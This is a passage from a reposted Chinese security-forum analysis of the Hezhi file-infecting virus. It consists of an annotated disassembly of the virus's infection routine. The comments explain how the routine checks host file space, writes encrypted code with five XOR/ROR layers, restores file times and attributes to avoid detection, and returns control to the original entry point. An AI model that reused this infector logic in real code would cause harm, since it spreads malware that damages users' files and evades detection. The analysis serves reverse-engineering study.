00412D27  0F87 BD010000 JA CLSPACK.00412EEA \\不符合感染条件则跳(空间不够大)
00412D2D  60       PUSHAD
00412D2E  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412D34  6A 00       PUSH 0
00412D36  6A 00       PUSH 0
00412D38  8B97 A22E0000 MOV EDX,DWORD PTR DS:[EDI+2EA2]
00412D3E  52       PUSH EDX
00412D3F  53       PUSH EBX
00412D40  FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]  \\SetFilePointer
00412D46  83F8 00    CMP EAX,0
00412D49  61       POPAD
00412D4A  0F84 9A010000 JE CLSPACK.00412EEA
00412D50  60       PUSHAD
00412D51  6A 00       PUSH 0
00412D53  8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412D59  50       PUSH EAX
00412D5A  B8 04020000 MOV EAX,204
00412D5F  50       PUSH EAX
00412D60  8D87 A62E0000 LEA EAX,DWORD PTR DS:[EDI+2EA6]
00412D66  50       PUSH EAX
00412D67  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412D6D  53       PUSH EBX
00412D6E  FF97 9D2A0000 CALL DWORD PTR DS:[EDI+2A9D]  \\ReadFileA
00412D74  83F8 00    CMP EAX,0
00412D77  61       POPAD
00412D78  0F84 6C010000 JE CLSPACK.00412EEA
00412D7E  83BF A6300000 00 CMP DWORD PTR DS:[EDI+30A6],0
00412D85  75 0A       JNZ SHORT CLSPACK.00412D91
00412D87  C787 A6300000 6A>MOV DWORD PTR DS:[EDI+30A6],23EDA56A
00412D91  60       PUSHAD
00412D92  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412D98  6A 00       PUSH 0
00412D9A  6A 00       PUSH 0
00412D9C  8B97 A22E0000 MOV EDX,DWORD PTR DS:[EDI+2EA2]
00412DA2  52       PUSH EDX
00412DA3  53       PUSH EBX
00412DA4  FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]  \\SetFilePointer
00412DAA  83F8 00    CMP EAX,0
00412DAD  61       POPAD
00412DAE  0F84 36010000 JE CLSPACK.00412EEA
00412DB4  60       PUSHAD
00412DB5  6A 00       PUSH 0
00412DB7  8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412DBD  50       PUSH EAX
00412DBE  B8 00020000 MOV EAX,200
00412DC3  50       PUSH EAX
00412DC4  8D87 4E3F0000 LEA EAX,DWORD PTR DS:[EDI+3F4E]
00412DCA  50       PUSH EAX
00412DCB  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412DD1  53       PUSH EBX
00412DD2  FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]  \\WriteFileA
00412DD8  83F8 00    CMP EAX,0
00412DDB  61       POPAD
00412DDC  0F84 08010000 JE CLSPACK.00412EEA
00412DE2  E8 F5030000 CALL CLSPACK.004131DC \\Xor [ESI],EAX  len=1FCH
00412DE7  E8 21050000 CALL CLSPACK.0041330D \\ROR EAX,10H len=BF5H
00412DEC  E8 3B050000 CALL CLSPACK.0041332C \\这里是五层加密的地方
00412DF1  E8 F9040000 CALL CLSPACK.004132EF
00412DF6  E8 C3040000 CALL CLSPACK.004132BE \\跟前面的五次解密顺序相反
00412DFB  60       PUSHAD
00412DFC  E8 92030000 CALL CLSPACK.00413193
00412E01  61       POPAD
00412E02  60       PUSHAD
00412E03  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E09  6A 00       PUSH 0
00412E0B  6A 00       PUSH 0
00412E0D  52       PUSH EDX
00412E0E  53       PUSH EBX
00412E0F  FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]
00412E15  83F8 00    CMP EAX,0
00412E18  61       POPAD
00412E19  0F84 CB000000 JE CLSPACK.00412EEA
00412E1F  60       PUSHAD
00412E20  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E26  6A 00       PUSH 0
00412E28  8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412E2E  50       PUSH EAX
00412E2F  51       PUSH ECX
00412E30  8D87 4E3F0000 LEA EAX,DWORD PTR DS:[EDI+3F4E]
00412E36  50       PUSH EAX
00412E37  53       PUSH EBX
00412E38  FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]
00412E3E  83F8 00    CMP EAX,0
00412E41  61       POPAD
00412E42  0F84 A2000000 JE CLSPACK.00412EEA
00412E48  60       PUSHAD
00412E49  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E4F  6A 00       PUSH 0
00412E51  6A 00       PUSH 0
00412E53  FFB7 902E0000 PUSH DWORD PTR DS:[EDI+2E90]
00412E59  53       PUSH EBX
00412E5A  FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]
00412E60  83F8 00    CMP EAX,0
00412E63  61       POPAD
00412E64  0F84 80000000 JE CLSPACK.00412EEA
00412E6A  60       PUSHAD
00412E6B  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E71  6A 00       PUSH 0
00412E73  8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412E79  50       PUSH EAX
00412E7A  68 00040000 PUSH 400
00412E7F  8D87 4A310000 LEA EAX,DWORD PTR DS:[EDI+314A]
00412E85  50       PUSH EAX
00412E86  53       PUSH EBX
00412E87  FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]
00412E8D  83F8 00    CMP EAX,0
00412E90  61       POPAD
00412E91  74 57       JE SHORT CLSPACK.00412EEA
00412E93  60       PUSHAD
00412E94  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412E9A  6A 00       PUSH 0
00412E9C  6A 00       PUSH 0
00412E9E  FFB7 8C2E0000 PUSH DWORD PTR DS:[EDI+2E8C]
00412EA4  53       PUSH EBX
00412EA5  FF97 892A0000 CALL DWORD PTR DS:[EDI+2A89]
00412EAB  83F8 00    CMP EAX,0
00412EAE  61       POPAD
00412EAF  74 39       JE SHORT CLSPACK.00412EEA
00412EB1  E8 0A050000 CALL CLSPACK.004133C0
00412EB6  E8 D20C0000 CALL CLSPACK.00413B8D
00412EBB  E8 35030000 CALL CLSPACK.004131F5
00412EC0  60       PUSHAD
00412EC1  8B9F 882E0000 MOV EBX,DWORD PTR DS:[EDI+2E88]
00412EC7  6A 00       PUSH 0
00412EC9  8D87 9C2E0000 LEA EAX,DWORD PTR DS:[EDI+2E9C]
00412ECF  50       PUSH EAX
00412ED0  FFB7 AE300000 PUSH DWORD PTR DS:[EDI+30AE]
00412ED6  8D87 4A310000 LEA EAX,DWORD PTR DS:[EDI+314A]
00412EDC  50       PUSH EAX
00412EDD  53       PUSH EBX
00412EDE  FF97 7D2A0000 CALL DWORD PTR DS:[EDI+2A7D]
00412EE4  83F8 00    CMP EAX,0
00412EE7  61       POPAD
00412EE8  74 00       JE SHORT CLSPACK.00412EEA
00412EEA  8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]
00412EF0  83E8 2C    SUB EAX,2C
00412EF3  83C0 14    ADD EAX,14
00412EF6  50       PUSH EAX
00412EF7  8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]
00412EFD  83E8 2C    SUB EAX,2C
00412F00  83C0 0C    ADD EAX,0C
00412F03  50       PUSH EAX
00412F04  8B87 B8290000 MOV EAX,DWORD PTR DS:[EDI+29B8]
00412F0A  83E8 2C    SUB EAX,2C
00412F0D  83C0 04    ADD EAX,4
00412F10  50       PUSH EAX
00412F11  FFB7 882E0000 PUSH DWORD PTR DS:[EDI+2E88]
00412F17  FF97 B52A0000 CALL DWORD PTR DS:[EDI+2AB5]
00412F1D  FFB7 882E0000 PUSH DWORD PTR DS:[EDI+2E88]
00412F23  FF97 792A0000 CALL DWORD PTR DS:[EDI+2A79] \\SetFileTime 恢复文件时间,防止被发现
00412F29  81BF 412B0000 88>CMP DWORD PTR DS:[EDI+2B41],88888888
00412F33  74 17       JE SHORT CLSPACK.00412F4C
00412F35  81BF 4D2B0000 CC>CMP DWORD PTR DS:[EDI+2B4D],CCCCCCCC
00412F3F  74 0B       JE SHORT CLSPACK.00412F4C
00412F41  68 00100000 PUSH 1000
00412F46  FF97 A92A0000 CALL DWORD PTR DS:[EDI+2AA9] \\Sleep
00412F4C  FFB7 842E0000 PUSH DWORD PTR DS:[EDI+2E84]
00412F52  FFB7 B4290000 PUSH DWORD PTR DS:[EDI+29B4]
00412F58  FF97 A12A0000 CALL DWORD PTR DS:[EDI+2AA1] \\SetFileAttrubutes  恢复文件属性
00412F5E  5E       POP ESI
00412F5F  C3       RETN

12.则解密原宿主程序代码(总共200字节),
   恢复原AddressOfEntryPoint,执行原程序.

页: [1]

邪恶八进制信息安全团队技术讨论组's Archiver

[转载]Hezhi病毒详细分析